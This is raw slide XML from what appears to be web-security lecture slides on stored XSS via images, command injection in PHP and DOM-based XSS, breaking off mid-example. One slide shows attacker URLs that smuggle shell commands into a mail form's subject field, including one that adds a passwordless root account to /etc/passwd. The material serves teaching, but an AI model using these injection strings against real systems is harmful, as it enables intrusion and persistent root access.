              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="10799911" y="1066872"/>
                  <a:ext cx="1998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5A3431CC-888A-3542-B928-FD9A0DDAA451}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10708111" y="1092072"/>
                <a:ext cx="114120" cy="155160"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="17" name="Ink 16">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3431CC-888A-3542-B928-FD9A0DDAA451}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId13"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="10672111" y="1056432"/>
                  <a:ext cx="1857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141A2CEC-EF96-344B-BF6F-6D75CD07B76A}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10862191" y="1099992"/>
                <a:ext cx="162360" cy="54000"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="19" name="Ink 18">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{141A2CEC-EF96-344B-BF6F-6D75CD07B76A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId15"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="10826551" y="1064352"/>
                  <a:ext cx="23400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D489A411-F7D4-D84E-B8CC-F3F9DD332517}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="8696344" y="4954045"/>
              <a:ext cx="1393560" cy="572040"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="21" name="Ink 20">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D489A411-F7D4-D84E-B8CC-F3F9DD332517}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId17"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="8660344" y="4918405"/>
                <a:ext cx="1465200" cy="643680"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="24" name="Group 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66CFDC9F-025C-7B4B-8C4D-6FFC7FAA0DEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7423024" y="5423485"/>
            <a:ext cx="1504440" cy="398880"/>
            <a:chOff x="7423024" y="5423485"/>
            <a:chExt cx="1504440" cy="398880"/>
          </a:xfrm>
        </p:grpSpPr>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CD94740D-33E1-244D-8248-2D3C422BF4DE}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7423024" y="5423485"/>
                <a:ext cx="1504440" cy="236880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="22" name="Ink 21">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD94740D-33E1-244D-8248-2D3C422BF4DE}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId19"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7387024" y="5387845"/>
                  <a:ext cx="15760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9F30C56B-4923-E844-A08D-357196247520}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7445344" y="5693845"/>
                <a:ext cx="146880" cy="128520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="23" name="Ink 22">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F30C56B-4923-E844-A08D-357196247520}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId21"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="7409344" y="5657845"/>
                  <a:ext cx="218520" cy="200160"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="332672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81922" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{953D94BD-6CE3-B74E-8821-CE321A01DB5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676240" y="875324"/>
            <a:ext cx="3536510" cy="5093520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stored XSS Using Images</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81924" name="Content Placeholder 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AC517F6-7D26-3747-821D-05AFADE57CE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5478124" y="559477"/>
            <a:ext cx="6037636" cy="5475563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Suppose </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>pic.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> on web server contains HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Request for  http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>site.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>pic.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>  results in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="95E9EA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	HTTP/1.1  200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="95E9EA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="95E9EA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>         Content-Type:  image/jpeg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="95E9EA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        &lt;html&gt;  fooled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="95E9EA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="95E9EA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   &lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Some browsers will render this as HTML  (despite Content-Type)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>What if an attacker uploads an “image” that is a script to a photo-sharing site?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121479583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BDB4D0A-235C-A24E-8403-1E5908807276}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>More Command Injection in PHP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38915" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADCA0F0F-A7E3-7A41-8E3A-56757D3906C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2103120"/>
            <a:ext cx="3682621" cy="3849624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Typical PHP server-side code for sending email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Attacker posts</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42BB8E9E-5F20-4745-9C04-07B6E74DF7BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4606735" y="2051177"/>
            <a:ext cx="7064375" cy="1019175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>  $email = $_POST[“email”]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>  $subject = $_POST[“subject”]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>  system(“mail $email –s $subject &lt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>joinmynetwork</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBFE39BB-3999-A149-8B46-6D50B9944F47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4606735" y="3408922"/>
            <a:ext cx="7064375" cy="1219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buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>  http://yourdomain.com/mail.pl?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>     email=hacker@hackerhome.net&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>     subject=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> &lt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEE7E7E7-955E-7C4D-AE03-3E3A9477EA12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4606734" y="4996206"/>
            <a:ext cx="7064375" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>  http://yourdomain.com/mail.pl?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>     email=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>hacker@hackerhome.net&amp;subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>     echo “evil::0:0:root:/:/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>"&gt;&gt;/etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{895A0149-CDAA-8448-A810-AAF563425462}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7533564" y="4640236"/>
            <a:ext cx="391454" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="548606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le 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8B3D1D6-CA80-174B-906A-4DEB4DA25B02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>XSS of the Third Kind</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82948" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{391593B6-99CF-4045-95A0-91F788A54D1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2103120"/>
            <a:ext cx="10219900" cy="4297680"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Script builds webpage DOM in the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Monotype Sorts" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	&lt;HTML&gt;&lt;TITLE&gt;Welcome!&lt;/TITLE&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hi &lt;SCRIPT&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.URL.indexOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("name=") + 5; </a:t>
            </a:r>
            <a:r>
